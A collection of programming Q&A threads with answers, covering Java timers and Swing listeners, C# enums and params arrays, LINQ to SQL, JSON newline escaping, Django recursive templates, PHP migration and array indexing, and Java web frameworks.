If your `Timer` is only ever going to have one task to execute then I would suggest subclassing it: ``` import java.util.Timer; import java.util.TimerTask; public class ReschedulableTimer extends Timer { private Runnable task; private TimerTask timerTask; public void schedule(Runnable runnable, long delay) { task = runnable; timerTask = new TimerTask() { @Override public void run() { task.run(); } }; this.schedule(timerTask, delay); } public void reschedule(long delay) { timerTask.cancel(); timerTask = new TimerTask() { @Override public void run() { task.run(); } }; this.schedule(timerTask, delay); } } ``` You will need to work on the code to add checks for mis-use, but it should achieve what you want. The `ScheduledThreadPoolExecutor` does not seem to have built in support for rescheduling existing tasks either, but a similar approach should work there as well.
Resettable Java Timer
[ "", "java", "timer", "" ]
I am trying to link two fields of a given table to the same field in another table. I have done this before so I can't work out what is wrong this time. Anyway: ``` Table1 - Id (Primary) - FK-Table2a (Nullable, foreign key relationship in DB to Table2.Id) - FK-Table2b (Nullable, foreign key relationship in DB to Table2.Id) Table2 - Id (Primary) ``` The association works for FK-Table2a but not FK-Table2b. In fact, when I load into LINQ to SQL, it shows Table2.Id as associated to Table1.Id. If I try and change this, or add a new association for FK-Table2b to Table2.Id it says: "Properties do not have matching types". This also works in other projects - maybe I should just copy over the .dbml? Any ideas?
No idea on the cause, but I just reconstructed my .dbml from scratch and it fixed itself. Oh for a "refresh" feature...
I see this problem when I try to create one-to-one relationships where one side of the relationship is nullable (so really, one-to-zero/one). LINQ-to-SQL doesn't seem to support this so it appears we are forced to a plural relationship and a collection that will contain zero or one items. Annoying.
LINQ to SQL Association - "Properties do not have matching types"
[ "", "c#", "asp.net", "linq-to-sql", "dynamic-data", "" ]
I have a flag enum below. ``` [Flags] public enum FlagTest { None = 0x0, Flag1 = 0x1, Flag2 = 0x2, Flag3 = 0x4 } ``` I cannot make the if statement evaluate to true. ``` FlagTest testItem = FlagTest.Flag1 | FlagTest.Flag2; if (testItem == FlagTest.Flag1) { // Do something, // however This is never true. } ``` How can I make this true?
In .NET 4 there is a new method [Enum.HasFlag](http://msdn.microsoft.com/en-us/library/system.enum.hasflag%28VS.100%29.aspx). This allows you to write: ``` if ( testItem.HasFlag( FlagTest.Flag1 ) ) { // Do Stuff } ``` which is much more readable, IMO. The .NET source indicates that this performs the same logic as the accepted answer: ``` public Boolean HasFlag(Enum flag) { if (!this.GetType().IsEquivalentTo(flag.GetType())) { throw new ArgumentException( Environment.GetResourceString( "Argument_EnumTypeDoesNotMatch", flag.GetType(), this.GetType())); } ulong uFlag = ToUInt64(flag.GetValue()); ulong uThis = ToUInt64(GetValue()); // test predicate return ((uThis & uFlag) == uFlag); } ```
``` if ((testItem & FlagTest.Flag1) == FlagTest.Flag1) { // Do something } ``` `(testItem & FlagTest.Flag1)` is a bitwise AND operation. `FlagTest.Flag1` is equivalent to `001` with OP's enum. Now let's say `testItem` has Flag1 and Flag2 (so it's bitwise `101`): ``` 001 &101 ---- 001 == FlagTest.Flag1 ```
How to Compare Flags in C#?
[ "", "c#", ".net", "enums", "attributes", "flags", "" ]
I have values stored as strings in a `DataTable` where each value could really represent an `int`, `double`, or `string` (they were all converted to strings during an import process from an external data source). I need to test and see what type each value really is. What is more efficient for the application (or is there no practical difference)? 1. Try to convert to `int` (and then `double`). If conversion works, the return `true`. If an exception is thrown, return `false`. 2. Regular expressions designed to match the pattern of an `int` or `double` 3. Some other method?
Would use double.TryParse, it has performance benefits.
I would say, don't worry so much about such micro performance. It is much better to just get something to work, and then make it as clear and concise and easy to read as possible. The worst thing you can do is sacrifice readability for an insignificant amount of performance. In the end, the best way to deal with performance issues is to save them for when you have data that indicates there is an actual performance problem... otherwise you will spend a lot of time micro-optimizing and actually cause higher maintenance costs for later on. If you find this parsing situation is really the bottleneck in your application, THEN is the time to try and figure out what the fastest way to solve the problem is. I think Jeff (and many others) have blogged about this sort of thing a lot.
Most Efficient Way to Test Object Type
[ "", "c#", ".net", "double", "int", "" ]
So I've got a `JPanel` implementing `MouseListener` and `MouseMotionListener`: ``` import javax.swing.*; import java.awt.*; import java.awt.event.*; public class DisplayArea extends JPanel implements MouseListener, MouseMotionListener { public DisplayArea(Rectangle bounds, Display display) { setLayout(null); setBounds(bounds); setOpaque(false); setPreferredSize(new Dimension(bounds.width, bounds.height)); this.display = display; } public void paintComponent(Graphics g) { Graphics2D g2 = (Graphics2D)g; if (display.getControlPanel().Antialiasing()) { g2.addRenderingHints(new RenderingHints(RenderingHints.KEY_ANTIALIASING, RenderingHints.VALUE_ANTIALIAS_ON)); } g2.setColor(Color.white); g2.fillRect(0, 0, getWidth(), getHeight()); } public void mousePressed(MouseEvent event) { System.out.println("mousePressed()"); mx1 = event.getX(); my1 = event.getY(); } public void mouseReleased(MouseEvent event) { System.out.println("mouseReleased()"); mx2 = event.getX(); my2 = event.getY(); int mode = display.getControlPanel().Mode(); switch (mode) { case ControlPanel.LINE: System.out.println("Line from " + mx1 + ", " + my1 + " to " + mx2 + ", " + my2 + "."); } } public void mouseEntered(MouseEvent event) { System.out.println("mouseEntered()"); } public void mouseExited(MouseEvent event) { System.out.println("mouseExited()"); } public void mouseClicked(MouseEvent event) { System.out.println("mouseClicked()"); } public void mouseMoved(MouseEvent event) { System.out.println("mouseMoved()"); } public void mouseDragged(MouseEvent event) { System.out.println("mouseDragged()"); } private Display display = null; private int mx1 = -1; private int my1 = -1; private int mx2 = -1; private int my2 = -1; } ``` The trouble is, none of these mouse functions are ever called. `DisplayArea` is created like this: ``` da = new DisplayArea(new Rectangle(CONTROL_WIDTH, 0, DISPLAY_WIDTH, DISPLAY_HEIGHT), this); ``` I am not really a Java programmer (this is part of an assignment), but I can't see anything glaringly obvious. Can someone smarter than I see anything?
The *implements mouselistener, mousemotionlistener* just allows the displayArea class to listen to some, to be defined, Swing component's mouse events. You have to explicitly define what it should be listening at. So I suppose you could add something like this to the constructor: ``` this.addMouseListener(this); this.addMouseMotionListener(this); ```
I don't see anywhere in the code where you call addMouseListener(this) or addMouseMotionListener(this) for the DisplayArea in order for it to subscribe to those events.
My (Java/Swing) MouseListener isn't listening, help me figure out why
[ "", "java", "swing", "actionlistener", "mouselistener", "" ]
I've generated some JSON and I'm trying to pull it into an object in JavaScript. I keep getting errors. Here's what I have: ``` var data = '{"count" : 1, "stack" : "sometext\n\n"}'; var dataObj = eval('('+data+')'); ``` This gives me an error: ``` unterminated string literal ``` With `JSON.parse(data)`, I see similar error messages: "`Unexpected token ↵`" in Chrome, and "`unterminated string literal`" in Firefox and IE. When I take out the `\n` after `sometext` the error goes away in both cases. I can't seem to figure out why the `\n` makes `eval` and `JSON.parse` fail.
This is what you want: ``` var data = '{"count" : 1, "stack" : "sometext\\n\\n"}'; ``` You need to escape the `\` in your string (turning it into a double-`\`), otherwise it will become a newline in the JSON source, not the JSON data.
You will need to have a function which replaces `\n` to `\\n` in case `data` is not a string literal. ``` function jsonEscape(str) { return str.replace(/\n/g, "\\\\n").replace(/\r/g, "\\\\r").replace(/\t/g, "\\\\t"); } var data = '{"count" : 1, "stack" : "sometext\n\n"}'; var dataObj = JSON.parse(jsonEscape(data)); ``` Resulting `dataObj` will be ``` Object {count: 1, stack: "sometext\n\n"} ```
How do I handle newlines in JSON?
[ "", "javascript", "json", "newline", "" ]
I am considering creating my own website using Java and am trying to decide what framework to use. However, doing a quick search for Java frameworks returns more than 50 to choose from! My website is just going to be for my own enjoyment of building it in the beginning, but if it becomes popular, it would be good for it to have some scalability, or to at least be able to redesign for that. What are the main differences between the more popular frameworks? Are there instances where one significantly outperforms the others? For example, high-traffic enterprise applications versus low-traffic small applications. I'm also wondering if some are much easier to learn and use than others. Is there anyone who has experience with some of these frameworks and can make a recommendation? Does the sheer number of choices just serve as an early warning to avoid Java-based web development where possible?
I've used [Tapestry 3](http://tapestry.apache.org/tapestry3/), [Wicket](http://wicket.apache.org/), [Echo](http://echo.nextapp.com/site/), and [JSF](http://www.oracle.com/technetwork/java/javaee/javaserverfaces-139869.html) fairly extensively. I'd really recommend you look those over and pick the one that appears the easiest for you, and to most closely fit the way you prefer to work. Of them, the most comfortable for me to work with was [Wicket](http://wicket.apache.org/), due to the lightweight nature of component building and simplicity of page templating. That goes doubly so if you are using your own db code instead of Hibernate or some other framework (I was never completely happy with Wicket Hibernate or Spring Integration). [Echo](http://echo.nextapp.com/site/) is great if you don't mind writing all of your layout in Java. I know that is different now, but I still think that product serves a fairly narrow niche. They change the development model with every major release as well it seems. [Tapestry](http://tapestry.apache.org/tapestry3/) is a great product, but it is obviously very different from the others in terms of development model as it is led mainly by one dude. Howard Lewis Ship is no doubt quite smart, but I am disappointed with their decision to basically forget backwards compatibility with each release. Again, though, for your needs this may not matter, and I've always found the Tapestry products pleasurable to work against. [JSF](http://www.oracle.com/technetwork/java/javaee/javaserverfaces-139869.html) has been out for years, and still feels like something that a [Struts](http://struts.apache.org/) guy built to fix all of the problems of Struts. Without really understanding all of the problems with Struts. It still has an unfinished feel to it, although the product is obviously very flexible. I use it and have some fondness for it, with great hopes for its future. I think the next release (2.0) to be delivered in JEE6 will really bring it into its own, with a new template syntax (similar to Facelets) and a simplified component model (custom components in only 1 file... finally). And, of course, there are a million smaller frameworks and tools that get their own following ([Velocity](http://velocity.apache.org/) for basic needs, raw [JSPs](http://en.wikipedia.org/wiki/JavaServer_Pages), Struts, etc). I generally prefer component oriented frameworks myself, though. In the end, I'd recommend just taking a look at Tapestry, Wicket, and JSF and just picking the one that feels the best to you. You'll probably find one that just fits the way you like to work very quickly.
My favorite is the Spring Framework. With 2.5 Spring MVC is soooo kick ass, with new annotations, convention over configuration features, etc. If you're just doing something super simple you could also just try using the regular Servlet API and not bother with a framework.
What are the pros and cons of the assorted Java web frameworks?
[ "", "java", "web-frameworks", "rich-internet-application", "" ]
After reading the Head First Design Patterns book and using a number of other design patterns, I'm trying to understand the Observer pattern. Isn't this already implemented using Events in the .NET Framework?
Yes, it is. The observer pattern is also called the publish/subscribe pattern, which is exactly what events allow you to do.
I would say yes, it was Anders Heljsberg's intent to make the observer pattern a first-class language feature with events in C#, based on his experience with Delphi. Anders makes this and other design intentions clear in an excellent interview on [Software Engineering Radio](http://www.se-radio.net/podcast/2008-05/episode-97-interview-anders-hejlsberg).
In C#, isn't the observer pattern already implemented using Events?
[ "", "c#", ".net", "design-patterns", "" ]
Is it possible for the compiler to remove statements used for debugging purposes (such as logging) from production code? The debug statements would need to be marked somehow, maybe using annotations. It's easy to set a property (debug = true) and check it at each debug statement, but this can reduce performance. It would be nice if the compiler would simply make the debug statements vanish.
Two recommendations. **First:** for real logging, use a modern logging package like log4j or java's own built in logging. Don't worry about performance so much, the logging level check is on the order of nanoseconds. (it's an integer comparison). And if you have more than a single log statement, guard the whole block: (log4j, for example:) ``` if (logger.isDebugEnabled()) { // perform expensive operations // build string to log logger.debug("...."); } ``` This gives you the added ability control logging at runtime. Having to restart and run a debug build can be very inconvenient. **Second:** You may find [assertions](http://java.sun.com/j2se/1.4.2/docs/guide/lang/assert.html) are more what you need. An assertion is a statement which evaluates to a boolean result, with an optional message: ``` assert (sky.state != FALLING) : "The sky is falling!"; ``` Whenever the assertion results in a false, the assertion fails and an AssertionError is thrown containing your message (this is an unchecked exception, intended to exit the application). The neat thing is, these are treated special by the JVM and can toggled at runtime down to the class level, using a VM parameter (no recompile needed). If not enabled, there is zero overhead.
``` public abstract class Config { public static final boolean ENABLELOGGING = true; } ``` --- ``` import static Config.*; public class MyClass { public myMethod() { System.out.println("Hello, non-logging world"); if (ENABLELOGGING) { log("Hello, logging world."); } } } ``` The compiler will remove the code block with "Hello, logging world." in it if ENABLE\_LOGGING is set to true because it's a static final value. If you use an obfuscator such as proguard, then the Config class will vanish too. An obfuscator would also allow things like this instead: ``` public class MyClass { public myMethod() { System.out.println("Hello, non-logging world"); Log.log("Hello, logging world."); } } ``` --- ``` import static Config.*; public abstract class Log { public static void log(String s) { if (ENABLELOGGING) { log(s); } } } ``` The method Log#log would reduce to nothing in the compiler, and be removed by the obfuscator, along with any calls to that method and eventually even the Log class would itself be removed.
How to remove debug statements from production code in Java
[ "", "java", "debugging", "compiler-construction", "" ]
I have a tree structure in memory that I would like to render in HTML using a Django template. ``` class Node(): name = "node name" children = [] ``` There will be some object `root` that is a `Node`, and `children` is a list of `Node`s. `root` will be passed in the content of the template. I have found [this](http://blog.elsdoerfer.name/2008/01/22/recursion-in-django-templates/) one discussion of how this might be achieved, but the poster suggests this might not be good in a production environment. Does anybody know of a better way?
I think the canonical answer is: "Don't". What you should probably do instead is unravel the thing in your *view* code, so it's just a matter of iterating over (in|de)dents in the template. I think I'd do it by appending indents and dedents to a list while recursing through the tree and then sending that "travelogue" list to the template. (the template would then insert `<li>` and `</li>` from that list, creating the recursive structure with "understanding" it.) I'm also pretty sure recursively including template files is really a *wrong* way to do it...
Using `with` template tag, I could do tree/recursive list. Sample code: main template: assuming 'all\_root\_elems' is list of one or more root of tree ``` <ul> {%for node in all_root_elems %} {%include "tree_view_template.html" %} {%endfor%} </ul> ``` tree\_view\_template.html renders the nested `ul`, `li` and uses `node` template variable as below: ``` <li> {{node.name}} {%if node.has_childs %} <ul> {%for ch in node.all_childs %} {%with node=ch template_name="tree_view_template.html" %} {%include template_name%} {%endwith%} {%endfor%} </ul> {%endif%} </li> ```
How can I render a tree structure (recursive) using a django template?
[ "", "python", "django", "" ]
What are some good steps to follow for a smooth migration from PHP4 to PHP5. What are some types of code that are likely to break?
I also once worked on an app which used PHP4's XML support quite heavily, and would have required quite a bit of work to move to PHP5. One of the other significant changes I was looking at at the time was the change of the default handling of function parameters. In PHP4 if I remember, they were pass-by-copy unless you specified otherwise, but in PHP5 is changed to pass-by-reference by default. In well written code, that probably won't make a big difference to you, but it could certainly cause problems. I think one other thing I found changed is that objects are no longer allowed to overwrite their 'this' field. I would say that was a really bad idea to begin with (and I think it may have not been an intentional feature in PHP4), but I certainly found a few parts of our system that relied on it. Hope some of that helps.
The best advice I could give anyone working with PHP4 is this: ``` error_reporting( E_ALL ); ``` It pretty much will tell you exactly what you need to do.
PHP4 to PHP5 Migration
[ "", "php", "migration", "" ]
On a recent Java project, we needed a free Java based real-time data plotting utility. After much searching, we found this tool called the [Scientific Graphics Toolkit or SGT](http://www.epic.noaa.gov/java/sgt/) from NOAA. It seemed pretty robust, but we found out that it wasn't terribly configurable. Or at least not configurable enough to meet our needs. We ended up digging very deeply into the Java code and reverse engineering the code and changing it all around to make the plot tool look and act the way we wanted it to look and act. Of course, this killed any chance for future upgrades from NOAA. So what free or cheap Java based data plotting tools or libraries do you use? *Followup: Thanks for the [JFreeChart](http://www.jfree.org/jfreechart/) suggestions. I checked out their website and it looks like a very nice data charting and plotting utility. I should have made it clear in my original question that I was looking specifically to plot real-time data. I corrected my question above to make that point clear. It appears that [JFreeChart support for live data is marginal at best, though](http://www.jfree.org/jfreechart/faq.html#FAQ5). Any other suggestions out there?*
I've had success using [JFreeChart](http://www.jfree.org/jfreechart/) on multiple projects. It is *very* configurable. JFreeChart is open source, but they charge for the [developer guide](http://www.jfree.org/jfreechart/devguide.html). If you're doing something simple, the sample code is probably good enough. Otherwise, $50 for the developer guide is a pretty good bargain. With respect to "real-time" data, I've also used JFreeChart for these sorts of applications. Unfortunately, I had to create some custom data models with appropriate synchronization mechanisms to avoid race conditions. However, it wasn't terribly difficult and JFreeChart would still be my first choice. However, as the FAQ suggests, JFreeChart might not give you the best performance if that is a big concern.
I just ran into a similar issue (displaying fast-updating data for engineering purposes), and I'm using [JChart2D](http://jchart2d.sourceforge.net/docs/javadoc/index.html). It's pretty minimalist and has a few quirks but it seems fairly fast: I'm running a benchmark speed test where it's adding 2331 points per second (333x7 traces) to a strip chart and uses 1% of the CPU on my 3GHz Pentium 4.
Are there any decent free Java data plotting libraries out there?
[ "", "java", "plot", "configuration", "" ]
I've been developing a "Form Builder" in Javascript, and coming up to the part where I'll be sending the spec for the form back to the server to be stored. The builder maintains an internal data structure that represents the fields, label, options (for select/checkbox/radio), mandatory status, and the general sorting order of the fields. When I want to send this structure back to the server, which format should I communicate it with? Also, when restoring a server-saved form back into my Javascript builder, should I load in the data in the same format it sent it with, or should I rebuild the fields using the builder's `createField()` functions?
Best practice on this dictates that if you are not planning to use the stored data for anything other than recreating the form then the best method is to send it back in some sort of native format (As mentioned above) With this then you can just load the data back in and requires the least processing of any method.
When making and processing requests with JavaScript, I live and breath [JSON](http://json.org/). It's easy to build on the client side and there are tons of parsers for the server side, so both ends get to use their native tongue as much as possible.
Communication between Javascript and the server
[ "", "javascript", "server", "" ]
I would like to have an `iframe` take as much vertical space as it needs to display its content and not display a scrollbar. Is it at all possible ? Are there any workarounds?
This should set the `IFRAME` height to its content's height: ``` <script type="text/javascript"> the_height = document.getElementById('the_iframe').contentWindow.document.body.scrollHeight; document.getElementById('the_iframe').height = the_height; </script> ``` You may want to add `scrolling="no"` to your `IFRAME` to turn off the scrollbars. *edit:* Oops, forgot to declare `the_height`.
This CSS snippet should remove the vertical scrollbar: ``` body { overflow-x: hidden; overflow-y: hidden; } ``` I'm not sure yet about having it take up as much vertical space as it needs, but I'll see if I can't figure it out.
Making an iframe take vertical space
[ "", "javascript", "html", "css", "iframe", "" ]
After changing the output directory of a visual studio project it started to fail to build with an error very much like: ``` C:\Program Files\Microsoft Visual Studio 8\SDK\v2.0\bin\sgen.exe /assembly:C:\p4root\Zantaz\trunk\EASDiscovery\EASDiscoveryCaseManagement\obj\Release\EASDiscoveryCaseManagement.dll /proxytypes /reference:C:\p4root\Zantaz\trunk\EASDiscovery\EasDiscovery.Common\target\win_x32\release\results\EASDiscovery.Common.dll /reference:C:\p4root\Zantaz\trunk\EASDiscovery\EasDiscovery.Export\target\win_x32\release\results\EASDiscovery.Export.dll /reference:c:\p4root\Zantaz\trunk\EASDiscovery\ItemCache\target\win_x32\release\results\EasDiscovery.ItemCache.dll /reference:c:\p4root\Zantaz\trunk\EASDiscovery\RetrievalEngine\target\win_x32\release\results\EasDiscovery.RetrievalEngine.dll /reference:C:\p4root\Zantaz\trunk\EASDiscovery\EASDiscoveryJobs\target\win_x32\release\results\EASDiscoveryJobs.dll /reference:"C:\Program Files\Infragistics\NetAdvantage for .NET 2008 Vol. 1 CLR 2.0\Windows Forms\Bin\Infragistics2.Shared.v8.1.dll" /reference:"C:\Program Files\Infragistics\NetAdvantage for .NET 2008 Vol. 1 CLR 2.0\Windows Forms\Bin\Infragistics2.Win.Misc.v8.1.dll" /reference:"C:\Program Files\Infragistics\NetAdvantage for .NET 2008 Vol. 1 CLR 2.0\Windows Forms\Bin\Infragistics2.Win.UltraWinChart.v8.1.dll" /reference:"C:\Program Files\Infragistics\NetAdvantage for .NET 2008 Vol. 1 CLR 2.0\Windows Forms\Bin\Infragistics2.Win.UltraWinDataSource.v8.1.dll" /reference:"C:\Program Files\Infragistics\NetAdvantage for .NET 2008 Vol. 1 CLR 2.0\Windows Forms\Bin\Infragistics2.Win.UltraWinDock.v8.1.dll" /reference:"C:\Program Files\Infragistics\NetAdvantage for .NET 2008 Vol. 1 CLR 2.0\Windows Forms\Bin\Infragistics2.Win.UltraWinEditors.v8.1.dll" /reference:"C:\Program Files\Infragistics\NetAdvantage for .NET 2008 Vol. 1 CLR 2.0\Windows Forms\Bin\Infragistics2.Win.UltraWinGrid.v8.1.dll" /reference:"C:\Program Files\Infragistics\NetAdvantage for .NET 2008 Vol. 1 CLR 2.0\Windows Forms\Bin\Infragistics2.Win.UltraWinListView.v8.1.dll" /reference:"C:\Program Files\Infragistics\NetAdvantage for .NET 2008 Vol. 1 CLR 2.0\Windows Forms\Bin\Infragistics2.Win.UltraWinMaskedEdit.v8.1.dll" /reference:"C:\Program Files\Infragistics\NetAdvantage for .NET 2008 Vol. 1 CLR 2.0\Windows Forms\Bin\Infragistics2.Win.UltraWinStatusBar.v8.1.dll" /reference:"C:\Program Files\Infragistics\NetAdvantage for .NET 2008 Vol. 1 CLR 2.0\Windows Forms\Bin\Infragistics2.Win.UltraWinTabControl.v8.1.dll" /reference:"C:\Program Files\Infragistics\NetAdvantage for .NET 2008 Vol. 1 CLR 2.0\Windows Forms\Bin\Infragistics2.Win.UltraWinToolbars.v8.1.dll" /reference:"C:\Program Files\Infragistics\NetAdvantage for .NET 2008 Vol. 1 CLR 2.0\Windows Forms\Bin\Infragistics2.Win.UltraWinTree.v8.1.dll" /reference:"C:\Program Files\Infragistics\NetAdvantage for .NET 2008 Vol. 1 CLR 2.0\Windows Forms\Bin\Infragistics2.Win.v8.1.dll" /reference:"C:\Program Files\Microsoft Visual Studio 8\ReportViewer\Microsoft.ReportViewer.Common.dll" /reference:"C:\Program Files\Microsoft Visual Studio 8\ReportViewer\Microsoft.ReportViewer.WinForms.dll" /reference:C:\p4root\Zantaz\trunk\EASDiscovery\PreviewControl\target\win_x32\release\results\PreviewControl.dll /reference:C:\p4root\Zantaz\trunk\EASDiscovery\Quartz\src\Quartz\target\win_x32\release\results\Scheduler.dll /reference:c:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\System.configuration.dll /reference:c:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\System.Data.dll /reference:c:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\System.Design.dll /reference:c:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\System.DirectoryServices.dll /reference:c:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\System.dll /reference:c:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\System.Drawing.dll /reference:c:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\System.Web.dll /reference:c:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\System.Web.Services.dll /reference:c:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\System.Windows.Forms.dll /reference:c:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\System.Xml.dll /compiler:/delaysign- Error: The specified module could not be found. (Exception from HRESULT: 0x8007007E) C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\Microsoft.Common.targets(1902,9): error MSB6006: "sgen.exe" exited with code 1. ``` I changed the output directory to target/win\_x32/release/results but the path in sgen doesn't seem to have been updated. There seems to be no reference in the project to what path is passed into sgen so I'm unsure how to fix it. As a workaround I have disabled the serialization generation but it would be nice to fix the underlying problem. Has anybody else seen this?
see [msdn](http://msdn.microsoft.com/en-us/library/bk3w6240(VS.80).aspx) for the options to sgen.exe [you have the command line, you can play with it manually... delete your .XmlSerializers.dll or use /force though] Today I also ran across how to more [manually specify the sgen options](http://www.kiwidude.com/blog/2007/02/vs2005-when-sgen-doesnt-work.html). I wanted this to not use the /proxy switch, but it appears it can let you specify the output directory. I don't know enough about msbuild to make it awesome, but this should get you started [open your .csproj/.vbproj in your non-visual studio editor of choice, look at the bottom and you should be able to figure out how/where this goes] [the below code has had UseProxyTypes set to true for your convenience] ``` <Target Name="GenerateSerializationAssembliesForAllTypes" DependsOnTargets="AssignTargetPaths;Compile;ResolveKeySource" Inputs="$(MSBuildAllProjects);@(IntermediateAssembly)" Outputs="$(OutputPath)$(_SGenDllName)"> <SGen BuildAssemblyName="$(TargetFileName)" BuildAssemblyPath="$(OutputPath)" References="@(ReferencePath)" ShouldGenerateSerializer="true" UseProxyTypes="true" KeyContainer="$(KeyContainerName)" KeyFile="$(KeyOriginatorFile)" DelaySign="$(DelaySign)" ToolPath="$(SGenToolPath)"> <Output TaskParameter="SerializationAssembly" ItemName="SerializationAssembly" /> </SGen> </Target> <!-- <Target Name="BeforeBuild"> </Target> --> <Target Name="AfterBuild" DependsOnTargets="GenerateSerializationAssembliesForAllTypes"> </Target> ```
If you are having this problem while building your VS.NET project in Release mode here is the solution: Go to the project properties and click on the Build tab and set the value of the "Generate Serialization Assembly" dropdown to "Off". Sgen.exe is "The XML Serializer Generator creates an XML serialization assembly for types in a specified assembly in order to improve the startup performance of a XmlSerializer when it serializes or deserializes objects of the specified types." ([MSDN](https://msdn.microsoft.com/en-us/library/bk3w6240%28v=vs.110%29.aspx))
sgen.exe fails during build
[ "", "c#", "visual-studio", "msbuild", "" ]
What is the difference, if any, between these methods of indexing into a PHP array: ``` $array[$index] $array["$index"] $array["{$index}"] ``` I'm interested in both the performance and functional differences. ### Update: (In response to @Jeremy) I'm not sure that's right. I ran this code: ``` $array = array(100, 200, 300); print_r($array); $idx = 0; $array[$idx] = 123; print_r($array); $array["$idx"] = 456; print_r($array); $array["{$idx}"] = 789; print_r($array); ``` And got this output: ``` Array ( [0] => 100 [1] => 200 [2] => 300 ) Array ( [0] => 123 [1] => 200 [2] => 300 ) Array ( [0] => 456 [1] => 200 [2] => 300 ) Array ( [0] => 789 [1] => 200 [2] => 300 ) ```
see @svec and @jeremy above. All array indices are of type 'int' first, then type 'string', and will be cast to that as PHP sees fit. Performance wise, $index should be faster than "$index" and "{$index}" (which are the same). Once you start a double-quote string, PHP will go into interpolation mode and treat it as a string first, but looking for variable markers ($, {}, etc) to replace from the local scope. This is why in most discussions, true 'static' strings should always be single quotes unless you need the escape-shortcuts like "\n" or "\t", because PHP will not need to try to interpolate the string at runtime and the full string can be compiled statically. In this case, doublequoting will first copy the $index into that string, then return the string, where directly using $index will just return the string.
I timed the 3 ways of using an index like this: ``` for ($ii = 0; $ii < 1000000; $ii++) { // TEST 1 $array[$idx] = $ii; // TEST 2 $array["$idx"] = $ii; // TEST 3 $array["{$idx}"] = $ii; } ``` The first set of tests used `$idx=0`, the second set used `$idx="0"`, and the third set used `$idx="blah"`. Timing was done using `microtime()` diffs. I'm using WinXP, PHP 5.2, Apache 2.2, and Vim. :-) And here are the results: ### Using `$idx = 0` ``` $array[$idx] // time: 0.45435905456543 seconds $array["$idx"] // time: 1.0537171363831 seconds $array["{$idx}"] // time: 1.0621709823608 seconds ratio "$idx" / $idx // 2.3191287282497 ratio "{$idx}" / $idx // 2.3377348193858 ``` ### Using `$idx = "0"` ``` $array[$idx] // time: 0.5107250213623 seconds $array["$idx"] // time: 0.77445602416992 seconds $array["{$idx}"] // time: 0.77329802513123 seconds ratio "$idx" / $idx // = 1.5163855142717 ratio "{$idx}" / $idx // = 1.5141181512285 ``` ### Using `$idx = "blah"` ``` $array[$idx] // time: 0.48077392578125 seconds $array["$idx"] // time: 0.73676419258118 seconds $array["{$idx}"] // time: 0.71499705314636 seconds ratio "$idx" / $idx // = 1.5324545551923 ratio "{$idx}" / $idx // = 1.4871793473086 ``` So `$array[$idx]` is the hands-down winner of the performance competition, at least on my machine. (The results were very repeatable, BTW, I ran it 3 or 4 times and got the same results.)
PHP array indexing: $array[$index] vs $array["$index"] vs $array["{$index}"]
[ "", "php", "syntax", "" ]
I have inherited some legacy PHP code what was written back when it was standard practice to use [`register_globals`](http://php.net/register_globals) (As of PHP 4.2.0, this directive defaults to off, released 22. Apr 2002). We know now that it is bad for security to have it enabled. The problem is how do I find all the places in the code where I need to use `$_GET` or `$_POST`? My only thought was to set the error reporting to warn about uninitialized variables and then test each part of the site. Is there an easier way? Will I have to test each code path in the site or will PHP give a warning on a file basis?
If you set error reporting to E\_ALL, it warns in the error log about undefined variables complete with filename and line number (assuming you are logging to a file). However, it will warn only if when it comes across an undefined variable, so I think you will have to test each code path. Running php from the command line doesn't seem to help also. There is a debugging tool named xdebug, haven't tried it, but maybe that can be useful?
I wrote a [script](http://pastebin.com/f6f379371) using the built-in [Tokenizer](http://au.php.net/manual/en/ref.tokenizer.php) functions. Its pretty rough but it worked for the code base I was working on. I believe you could also use [CodeSniffer](http://pear.php.net/manual/en/package.php.php-codesniffer.php).
Making code work with register_globals turned off
[ "", "php", "register-globals", "" ]
I have a method which takes params object[] such as: ``` void Foo(params object[] items) { Console.WriteLine(items[0]); } ``` When I pass two object arrays to this method, it works fine: ``` Foo(new object[]{ (object)"1", (object)"2" }, new object[]{ (object)"3", (object)"4" } ); // Output: System.Object[] ``` But when I pass a single object[], it does not take my object[] as the first param, instead it takes its all elements like I wanted to pass them one by one: ``` Foo(new object[]{ (object)"1", (object)"2" }); // Output: 1, expected: System.Object[] ``` How do I pass a single object[] as a first argument to a params array?
A simple typecast will ensure the compiler knows what you mean in this case. ``` Foo((object)new object[]{ (object)"1", (object)"2" })); ``` As an array is a subtype of object, this all works out. Bit of an odd solution though, I'll agree.
The `params` parameter modifier gives callers a shortcut syntax for passing multiple arguments to a method. There are two ways to call a method with a `params` parameter: **1)** Calling with an array of the parameter type, in which case the `params` keyword has no effect and the array is passed directly to the method: ``` object[] array = new[] { "1", "2" }; // Foo receives the 'array' argument directly. Foo( array ); ``` **2)** Or, calling with an extended list of arguments, in which case the compiler will automatically wrap the list of arguments in a temporary array and pass that to the method: ``` // Foo receives a temporary array containing the list of arguments. Foo( "1", "2" ); // This is equivalent to: object[] temp = new[] { "1", "2" ); Foo( temp ); ``` In order to pass in an object array to a method with a "`params object[]`" parameter, you can either: **1)** Create a wrapper array manually and pass that directly to the method, as mentioned by [lassevk](https://stackoverflow.com/questions/36350/c-how-to-pass-a-single-object-to-a-params-object#36360): ``` Foo( new object[] { array } ); // Equivalent to calling convention 1. ``` **2)** Or, cast the argument to `object`, as mentioned by [Adam](https://stackoverflow.com/questions/36350/c-how-to-pass-a-single-object-to-a-params-object#36367), in which case the compiler will create the wrapper array for you: ``` Foo( (object)array ); // Equivalent to calling convention 2. ``` However, if the goal of the method is to process multiple object arrays, it may be easier to declare it with an explicit "`params object[][]`" parameter. This would allow you to pass multiple arrays as arguments: ``` void Foo( params object[][] arrays ) { foreach( object[] array in arrays ) { // process array } } ... Foo( new[] { "1", "2" }, new[] { "3", "4" } ); // Equivalent to: object[][] arrays = new[] { new[] { "1", "2" }, new[] { "3", "4" } }; Foo( arrays ); ``` --- **Edit:** Raymond Chen describes this behavior and how it relates to the C# specification in [a new post](https://devblogs.microsoft.com/oldnewthing/20130806-00/?p=3603).
How to pass a single object[] to a params object[]
